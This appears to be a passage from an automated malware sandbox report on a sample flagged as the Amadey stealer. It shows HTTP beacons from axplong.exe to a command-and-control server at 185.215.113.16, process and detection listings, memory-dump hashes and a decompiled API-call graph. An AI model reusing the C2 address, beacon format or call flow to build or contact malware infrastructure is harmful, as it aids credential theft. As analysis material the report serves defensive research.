                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:09.326592922 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.453714185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:09.446641922 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:10.136900902 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.453715185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:10.150201082 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:10.873265028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:02:40:04
                    Start date:27/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xeb0000
                    File size:1'882'624 bytes
                    MD5 hash:FC16F8C6B738FBB7D1A03848329360EA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1804337968.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1763252380.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:02:40:08
                    Start date:27/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0xf80000
                    File size:1'882'624 bytes
                    MD5 hash:FC16F8C6B738FBB7D1A03848329360EA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1841414182.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1800393603.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 55%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:02:40:09
                    Start date:27/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0xf80000
                    File size:1'882'624 bytes
                    MD5 hash:FC16F8C6B738FBB7D1A03848329360EA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1852188803.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1811913047.0000000005460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:6
                    Start time:02:41:00
                    Start date:27/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0xf80000
                    File size:1'882'624 bytes
                    MD5 hash:FC16F8C6B738FBB7D1A03848329360EA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2320957202.0000000005280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7765e188ec10174629957fd0ab82b06b8ec56e1074520e0d23d9f79c1cafee80
                      • Instruction ID: 32811cfd8b7afdda682b2952d09d1f92038ab4b208b87024546df72cf94a2e58
                      • Opcode Fuzzy Hash: 7765e188ec10174629957fd0ab82b06b8ec56e1074520e0d23d9f79c1cafee80
                      • Instruction Fuzzy Hash: 1701F7B778C515FDA102B0401A00AFA3A1DE2D5670B7084E6FF0B86502F2587A6DB1A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd807d3c0e6e215b38ad8b72fddf61f762faa6e9f575114b264b1b039c7c5615
                      • Instruction ID: 1669106ca6de095c8d4c4465f48964491d2fb50e55e95e2980057c871bd1ed62
                      • Opcode Fuzzy Hash: cd807d3c0e6e215b38ad8b72fddf61f762faa6e9f575114b264b1b039c7c5615
                      • Instruction Fuzzy Hash: 470126AA74C111FDA10271406B01AFA2B2C93D5730B3088E2FA0B96142F2983659B071
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da67bf8f357eb9f467bf6079f219cdc61a09717c181c26b32d9f2138e5b77b4c
                      • Instruction ID: 3a4ac7c131c5f2132adc5472523a6d30de7260d5b841c2a5ffa7996b3c3f57ca
                      • Opcode Fuzzy Hash: da67bf8f357eb9f467bf6079f219cdc61a09717c181c26b32d9f2138e5b77b4c
                      • Instruction Fuzzy Hash: E40149BB74C215FDA101B5406A00ABA7B6CE2C533073088F6FF0796201F2687A5DB171
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d41842fd992f3896e6617a7a87321a6ad510e8325381a291ae4bcb98a7d90a5
                      • Instruction ID: d1a7b772758c4166f707dbd640fb6a70c17015c6d95ae4d683a14721c1deb68e
                      • Opcode Fuzzy Hash: 5d41842fd992f3896e6617a7a87321a6ad510e8325381a291ae4bcb98a7d90a5
                      • Instruction Fuzzy Hash: ECF04CBB74C200EEE146BA40A6015B93F64E7C5330B3048F6FA479B111E2687679B261
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 495a63e4bc4e594f48be643137e577c530dcea5fb64da559ca0b2cf2bf60464a
                      • Instruction ID: a9bb28063881a283bd061f0fbc2d1860931fb52a874819e1af8bddaaf31fbcab
                      • Opcode Fuzzy Hash: 495a63e4bc4e594f48be643137e577c530dcea5fb64da559ca0b2cf2bf60464a
                      • Instruction Fuzzy Hash: 70F0C0A7A4C500FED102354057452F93F25B7DA33072044F1FB475B221F2993B6AB291
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a58e58ffbaead9614bba9f013dc6c8dc6ffbfcabccf12b66dc41ad249c32873b
                      • Instruction ID: d4e8bf74c5a61699cbe9f997061ce4d918194815144e9d167c91dd3e258fb266
                      • Opcode Fuzzy Hash: a58e58ffbaead9614bba9f013dc6c8dc6ffbfcabccf12b66dc41ad249c32873b
                      • Instruction Fuzzy Hash: B5F09EABB8C111FDD502754096455F53E26E7C737073049E1FA4B45120F2597A66B190
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fa1f6ecfd73341d8128b798226d0f496c80b246224eb6022e6be0b5c641f625
                      • Instruction ID: 1a7746a31e13f5f2d31ee20ae0a912d01920d2b9066adac3c2b315e840dd077b
                      • Opcode Fuzzy Hash: 3fa1f6ecfd73341d8128b798226d0f496c80b246224eb6022e6be0b5c641f625
                      • Instruction Fuzzy Hash: 0DF09EABF8C101FED202B55096456F63F29E7C7270B3048E1FA4705110F15A7A66B190
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 49aed577226ef1718af38f0d5958f563d73f39fe3ef0a020bed7b4f20b8fafb5
                      • Instruction ID: a1046e82cebd70552564bc0052117fb62f25745e2a9ad4e524c6455778c4fc80
                      • Opcode Fuzzy Hash: 49aed577226ef1718af38f0d5958f563d73f39fe3ef0a020bed7b4f20b8fafb5
                      • Instruction Fuzzy Hash: FBF05C6AB88204EEC101354057402B2776567D6370B7009B1F64366581E2A93696B180
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dcc606a8e4d2aacfa0aa7f739253f263d8642a269f78547045e3ac435b5f5d85
                      • Instruction ID: e20b2bfac2163cd96bce68701ad5fc89622b675deab747517ff83a63e04bcfe0
                      • Opcode Fuzzy Hash: dcc606a8e4d2aacfa0aa7f739253f263d8642a269f78547045e3ac435b5f5d85
                      • Instruction Fuzzy Hash: 44E0CD57DCC110D6C143755041851F67FD07B972717240DE5E24729652E14E2766B161
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fddadf1c954f3862b24cfe428afa119512b373d009f7209139b32b6de6d9b8f
                      • Instruction ID: 7278adcaf34b62b8856b54f63d4b2b56fca49ba81b3484af39890bb33e4af58d
                      • Opcode Fuzzy Hash: 3fddadf1c954f3862b24cfe428afa119512b373d009f7209139b32b6de6d9b8f
                      • Instruction Fuzzy Hash: C5B09B669C9811C14040355157593B6765436911113D01DD7E34746951651523F9F962
                      Memory Dump Source
                      • Source File: 00000000.00000002.1807013821.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e71a216ec331114769a2640426c3d9f962cf11bf8f1d69b783b23783829362e6
                      • Instruction ID: fe5b57bec76898768bf4e83d88c97cb9cfa305346b508f82113360d765e4f7a7
                      • Opcode Fuzzy Hash: e71a216ec331114769a2640426c3d9f962cf11bf8f1d69b783b23783829362e6
                      • Instruction Fuzzy Hash: 3D1125F72481507DB512A5512B24CFF3B6EE0D233033088A6F902DB982E2851F4E6171

                      Execution Graph

                      Execution Coverage:9.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:7.8%
                      Total number of Nodes:601
                      Total number of Limit Nodes:41
                      execution_graph 13318 fb6559 13319 fb63f7 __cftof 2 API calls 13318->13319 13320 fb656a 13319->13320 13189 f9b85e 13194 f9b6e5 13189->13194 13191 f9b886 13202 f9b648 13191->13202 13193 f9b89f 13195 f9b6f1 Concurrency::details::_Reschedule_chore 13194->13195 13196 f9b722 13195->13196 13212 f9c5dc 13195->13212 13196->13191 13200 f9b70c __Mtx_unlock 13201 f82ad0 10 API calls 13200->13201 13201->13196 13203 f9b654 Concurrency::details::_Reschedule_chore 13202->13203 13204 f9c5dc GetSystemTimePreciseAsFileTime 13203->13204 13211 f9b6ae 13203->13211 13205 f9b669 13204->13205 13206 f82ad0 10 API calls 13205->13206 13207 f9b66f __Mtx_unlock 13206->13207 13208 f82ad0 10 API calls 13207->13208 13209 f9b68c __Cnd_broadcast 13208->13209 13210 f82ad0 10 API calls 13209->13210 13209->13211 13210->13211 13211->13193 13220 f9c382 13212->13220 13214 f9b706 13215 f82ad0 13214->13215 13216 f82ada 13215->13216 13217 f82adc 13215->13217 13216->13200 13237 f9c19a 13217->13237 13221 f9c3d8 13220->13221 13223 f9c3aa 13220->13223 13221->13223 13226 f9ce9b 13221->13226 13223->13214 13224 f9c42d __Xtime_diff_to_millis2 13224->13223 13225 f9ce9b _xtime_get GetSystemTimePreciseAsFileTime 13224->13225 13225->13224 13227 f9ceaa 13226->13227 13229 f9ceb7 __aulldvrm 13226->13229 13227->13229 13230 f9ce74 13227->13230 13229->13224 13233 f9cb1a 13230->13233 13234 f9cb2b GetSystemTimePreciseAsFileTime 13233->13234 13235 f9cb37 13233->13235 13234->13235 13235->13229 13238 f9c1c2 13237->13238 13239 f9c1a4 13237->13239 13238->13238 13239->13238 13241 f9c1c7 13239->13241 13244 f82aa0 13241->13244 13243 f9c1de std::_Xinvalid_argument 13243->13239 13258 f9be0f 13244->13258 13246 f82abf 13246->13243 13247 fb8aaf __cftof 4 API calls 13248 fb6c26 13247->13248 13249 fb6c43 13248->13249 13250 fb6c35 13248->13250 13252 fb68bd 4 API calls 13249->13252 13251 fb6c99 9 API calls 13250->13251 13254 fb6c3f 13251->13254 13255 fb6c5d 13252->13255 13253 f82ab4 13253->13246 13253->13247 13254->13243 13256 fb6c99 9 API calls 13255->13256 13257 fb6c71 __freea 13255->13257 13256->13257 13257->13243 13261 f9cb61 13258->13261 13262 f9cb6f InitOnceExecuteOnce 13261->13262 13263 f9be22 13261->13263 13262->13263 13263->13253 13182 f886b0 13183 f886b6 13182->13183 13184 fb6659 RtlAllocateHeap 13183->13184 13185 f886c3 13184->13185 13186 f886d6 13185->13186 13187 fb66e7 4 API calls 13185->13187 13188 f886d0 13187->13188 13265 f8e410 13266 f8e435 13265->13266 13268 f8e419 13265->13268 13268->13266 13269 f8e270 13268->13269 13270 f8e280 __dosmaperr 13269->13270 13271 fb8979 4 API calls 13270->13271 13274 f8e2bd std::_Xinvalid_argument 13271->13274 13272 f8e435 13272->13268 13273 f8e270 4 API calls 13273->13274 13274->13272 13274->13273 13304 f8dfd0 recv 13305 f8e032 recv 13304->13305 13306 f8e067 recv 13305->13306 13308 f8e0a1 13306->13308 13307 f8e1c3 13308->13307 13309 f9c5dc GetSystemTimePreciseAsFileTime 13308->13309 13310 f8e1fe 13309->13310 13311 f9c19a 10 API calls 13310->13311 13312 f8e268 13311->13312 12929 f91dd0 12933 f91e6b shared_ptr __dosmaperr 12929->12933 12930 f91e78 12931 f8e440 6 API calls 12930->12931 12932 f92936 shared_ptr std::_Xinvalid_argument 12931->12932 12933->12930 12933->12932 12946 fb8979 12933->12946 12935 f92265 shared_ptr 12935->12932 12950 fb6659 12935->12950 12939 f9268b shared_ptr __dosmaperr 12939->12932 12940 fb8979 4 API calls 12939->12940 12941 f92759 12940->12941 12941->12930 12941->12932 12942 f927d1 12941->12942 12957 f8e440 12942->12957 12944 f92843 12944->12932 12975 f85df0 12944->12975 12947 fb8994 12946->12947 12982 fb86d7 12947->12982 12949 fb899e 12949->12935 13006 fb65a2 12950->13006 12952 f9267a 12952->12930 12953 fb66e7 12952->12953 12954 fb66f3 12953->12954 12956 fb66fd __cftof __dosmaperr 12954->12956 13018 fb6670 12954->13018 12956->12939 12958 f8e489 12957->12958 13041 f8bd60 12958->13041 12960 f8e9a9 shared_ptr 12960->12944 12961 f8e711 12961->12960 12962 f8e440 6 API calls 12961->12962 12964 f8f696 12962->12964 12963 f8f892 shared_ptr 12963->12944 12964->12963 12965 f8e440 6 API calls 12964->12965 12967 f8f973 12965->12967 12966 f8fa45 shared_ptr 12966->12944 12967->12966 12968 fb6659 RtlAllocateHeap 12967->12968 12969 f8fbf1 12968->12969 12970 f8e440 6 API calls 12969->12970 12972 f9054c 12970->12972 12971 f90790 shared_ptr 12971->12944 12972->12971 12973 f8e440 6 API calls 12972->12973 12974 f911f9 12973->12974 12977 f85e28 12975->12977 12976 f85f0e shared_ptr 12976->12932 12977->12976 12978 f86060 RegOpenKeyExA 12977->12978 12980 f8645a shared_ptr 12978->12980 12981 f860b3 __cftof 12978->12981 12979 f86153 RegEnumValueW 12979->12981 12980->12932 12981->12979 12981->12980 12983 fb86e9 12982->12983 12984 fb683a __cftof 4 API calls 12983->12984 12987 fb86fe __cftof __dosmaperr 12983->12987 12986 fb872e 12984->12986 12986->12987 12988 fb8925 12986->12988 12987->12949 12989 fb8962 12988->12989 12990 fb8932 12988->12990 12999 fbd2e9 12989->12999 12993 fb8941 __fassign 12990->12993 12994 fbd30d 12990->12994 12993->12986 12995 fb683a __cftof 4 API calls 12994->12995 12996 fbd32a 12995->12996 12998 fbd33a 12996->12998 13003 fbf07f 12996->13003 12998->12993 13000 fbd2f4 12999->13000 13001 fbb4bb __cftof 4 API calls 13000->13001 13002 fbd304 13001->13002 13002->12993 13004 fb683a __cftof 4 API calls 13003->13004 13005 fbf09f __cftof __fassign __freea 13004->13005 13005->12998 13007 fb65ae 13006->13007 13009 fb65b5 __cftof __dosmaperr 13007->13009 13010 fba783 13007->13010 13009->12952 13011 fba78f 13010->13011 13014 fba827 13011->13014 13013 fba7aa 13013->13009 13016 fba84a 13014->13016 13015 fbd6ef RtlAllocateHeap 13017 fba890 __freea 13015->13017 13016->13015 13016->13016 13016->13017 13017->13013 13019 fb6692 13018->13019 13021 fb667d __cftof __dosmaperr __freea 13018->13021 13019->13021 13022 fb9ef9 13019->13022 13021->12956 13023 fb9f36 13022->13023 13024 fb9f11 13022->13024 13023->13021 13024->13023 13026 fc02f8 13024->13026 13027 fc0304 13026->13027 13028 fc030c __cftof __dosmaperr 13027->13028 13030 fc03ea 13027->13030 13028->13023 13031 fc040c 13030->13031 13033 fc0410 __cftof __dosmaperr 13030->13033 13031->13033 13034 fbfb7f 13031->13034 13033->13028 13035 fbfbcc 13034->13035 13036 fb683a __cftof 4 API calls 13035->13036 13038 fbfbdb __cftof 13036->13038 13037 fbfe7b 13037->13033 13038->13037 13039 fbd2e9 4 API calls 13038->13039 13040 fbc4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13038->13040 13039->13038 13040->13038 13042 f8bdb2 13041->13042 13044 f8c14e shared_ptr 13041->13044 13043 f8bdc6 InternetOpenW InternetConnectA 13042->13043 13042->13044 13045 f8be3d 13043->13045 13044->12961 13046 f8be53 HttpOpenRequestA 13045->13046 13047 f8be71 shared_ptr 13046->13047 13048 f8bf13 HttpSendRequestA 13047->13048 13050 f8bf2b shared_ptr 13048->13050 13049 f8bfb3 InternetReadFile 13051 f8bfda 13049->13051 13050->13049 13411 f99310 13412 f99325 13411->13412 13413 f99363 13411->13413 13414 f9d041 SleepConditionVariableCS 13412->13414 13415 f9932f 13414->13415 13415->13413 13416 f9cff7 RtlWakeAllConditionVariable 13415->13416 13416->13413 13313 fb6974 13314 fb698c 13313->13314 13315 fb6982 13313->13315 13316 fb68bd 4 API calls 13314->13316 13317 fb69a6 __freea 13316->13317 12752 fb6beb 12753 fb6bf7 12752->12753 12764 fb8aaf 12753->12764 12755 fb6c26 12756 fb6c43 12755->12756 12757 fb6c35 12755->12757 12772 fb68bd 12756->12772 12758 fb6c99 9 API calls 12757->12758 12760 fb6c3f 12758->12760 12761 fb6c5d 12763 fb6c71 __freea 12761->12763 12775 fb6c99 12761->12775 12765 fb8ab4 __cftof 12764->12765 12768 fb8abf 12765->12768 12787 fbd4f4 12765->12787 12784 fb651d 12768->12784 12769 fbd727 RtlAllocateHeap 12770 fbd73a __dosmaperr 12769->12770 12771 fb8af2 __cftof 12769->12771 12770->12755 12771->12769 12771->12770 12806 fb683a 12772->12806 12774 fb68cf 12774->12761 12776 fb6cc4 __cftof 12775->12776 12782 fb6ca7 __cftof __dosmaperr 12775->12782 12777 fb6d06 CreateFileW 12776->12777 12783 fb6cea __cftof __dosmaperr 12776->12783 12778 fb6d2a 12777->12778 12779 fb6d38 12777->12779 12842 fb6e01 GetFileType 12778->12842 12856 fb6d77 12779->12856 12782->12763 12783->12763 12794 fb63f7 12784->12794 12789 fbd500 __cftof 12787->12789 12788 fbd55c __cftof __dosmaperr 12788->12768 12789->12788 12790 fb651d __cftof 2 API calls 12789->12790 12793 fbd6ee __cftof 12790->12793 12791 fbd727 RtlAllocateHeap 12792 fbd73a __dosmaperr 12791->12792 12791->12793 12792->12768 12793->12791 12793->12792 12795 fb6405 __cftof 12794->12795 12796 fb6450 12795->12796 12799 fb645b 12795->12799 12796->12771 12804 fba1c2 GetPEB 12799->12804 12801 fb6465 12802 fb646a GetPEB 12801->12802 12803 fb647a __cftof 12801->12803 12802->12803 12805 fba1dc __cftof 12804->12805 12805->12801 12807 fb6851 12806->12807 12808 fb685a 12806->12808 12807->12774 12808->12807 12812 fbb4bb 12808->12812 12813 fbb4ce 12812->12813 12815 fb6890 12812->12815 12813->12815 12820 fbf46b 12813->12820 12816 fbb4e8 12815->12816 12817 fbb4fb 12816->12817 12818 fbb510 12816->12818 12817->12818 12825 fbe571 12817->12825 12818->12807 12822 fbf477 __cftof 12820->12822 12821 fbf4c6 12821->12815 12822->12821 12823 fb8aaf __cftof 4 API calls 12822->12823 12824 fbf4eb 12823->12824 12826 fbe57b 12825->12826 12829 fbe489 12826->12829 12828 fbe581 12828->12818 12832 fbe495 __cftof __freea 12829->12832 12830 fbe4b6 12830->12828 12831 fb8aaf __cftof 4 API calls 12833 fbe528 12831->12833 12832->12830 12832->12831 12834 fbe564 12833->12834 12838 fba5ee 12833->12838 12834->12828 12839 fba611 12838->12839 12840 fb8aaf __cftof 4 API calls 12839->12840 12841 fba687 12840->12841 12843 fb6e3c 12842->12843 12849 fb6ed2 __dosmaperr 12842->12849 12844 fb6e56 __cftof 12843->12844 12878 fb7177 12843->12878 12846 fb6e75 GetFileInformationByHandle 12844->12846 12844->12849 12847 fb6e8b 12846->12847 12846->12849 12864 fb70c9 12847->12864 12849->12783 12852 fb6ea8 12853 fb6f71 SystemTimeToTzSpecificLocalTime 12852->12853 12854 fb6ebb 12853->12854 12855 fb6f71 SystemTimeToTzSpecificLocalTime 12854->12855 12855->12849 12901 fb7314 12856->12901 12858 fb6d85 12859 fb6d8a __dosmaperr 12858->12859 12860 fb70c9 4 API calls 12858->12860 12859->12783 12861 fb6da3 12860->12861 12862 fb7177 RtlAllocateHeap 12861->12862 12863 fb6dc2 12862->12863 12863->12783 12866 fb70df _wcsrchr 12864->12866 12865 fb6e97 12874 fb6f71 12865->12874 12866->12865 12882 fbb9e4 12866->12882 12868 fb7123 12868->12865 12869 fbb9e4 4 API calls 12868->12869 12870 fb7134 12869->12870 12870->12865 12871 fbb9e4 4 API calls 12870->12871 12872 fb7145 12871->12872 12872->12865 12873 fbb9e4 4 API calls 12872->12873 12873->12865 12875 fb6f89 12874->12875 12876 fb6fa9 SystemTimeToTzSpecificLocalTime 12875->12876 12877 fb6f8f 12875->12877 12876->12877 12877->12852 12879 fb7190 12878->12879 12881 fb71a4 __dosmaperr 12879->12881 12893 fbb568 12879->12893 12881->12844 12884 fbb9f2 12882->12884 12886 fbb9f8 __cftof __dosmaperr 12884->12886 12887 fbba2d 12884->12887 12885 fbba28 12885->12868 12886->12868 12888 fbba57 12887->12888 12891 fbba3d __cftof __dosmaperr 12887->12891 12889 fb683a __cftof 4 API calls 12888->12889 12888->12891 12890 fbba81 12889->12890 12890->12891 12892 fbb9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12890->12892 12891->12885 12892->12890 12894 fbb592 __cftof 12893->12894 12896 fbb5ae __dosmaperr __freea 12894->12896 12897 fbd6ef 12894->12897 12896->12881 12900 fbd6fc __cftof 12897->12900 12898 fbd727 RtlAllocateHeap 12899 fbd73a __dosmaperr 12898->12899 12898->12900 12899->12896 12900->12898 12900->12899 12902 fb7338 12901->12902 12904 fb733e 12902->12904 12905 fb7036 12902->12905 12904->12858 12906 fb7042 __dosmaperr 12905->12906 12911 fbb87b 12906->12911 12908 fb7068 12908->12904 12909 fb705a __dosmaperr 12909->12908 12910 fbb87b RtlAllocateHeap 12909->12910 12910->12908 12914 fbb6de 12911->12914 12913 fbb894 12913->12909 12915 fbb6ee 12914->12915 12917 fbb6f5 12915->12917 12918 fc1ef8 12915->12918 12917->12913 12921 fc1d22 12918->12921 12920 fc1f0f 12920->12917 12922 fc1d54 12921->12922 12924 fc1d40 __cftof __dosmaperr 12921->12924 12923 fbb568 